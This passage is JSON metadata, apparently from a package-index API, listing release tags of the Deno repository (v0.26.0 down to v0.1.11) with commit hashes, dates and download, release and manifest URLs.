.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name